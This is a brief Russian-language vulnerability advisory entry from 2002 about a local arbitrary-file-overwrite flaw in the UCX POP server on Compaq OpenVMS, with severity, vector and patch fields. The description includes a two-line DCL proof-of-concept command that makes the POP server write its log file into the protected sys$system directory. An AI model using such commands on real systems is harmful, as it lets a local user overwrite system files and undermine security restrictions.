Дата публикации: | 27.09.2002 |
Всего просмотров: | 944 |
Опасность: | Низкая |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Локальная |
Воздействие: | Обход ограничений безопасности |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | OpenVMS 7.x |
Описание: | Проблема обнаружена в UCX POP (Post Office Protocol) сервере, используемом в OpenVMS. Уязвимость позволяет локальному пользователю перезаписать произвольные файлы на файловой системе. Пример:
$ $ break_it :== $sys$system:ucx$pop_server.exe $ break_it -logfile sys$system:I_SHOULDNT_BE_ABLE_TO_WRITE_HEREуязвимость обнаружена в Compaq OpenVMS 5.3-7.3 |
Ссылки: | OpenVMS POP server local vulnerability |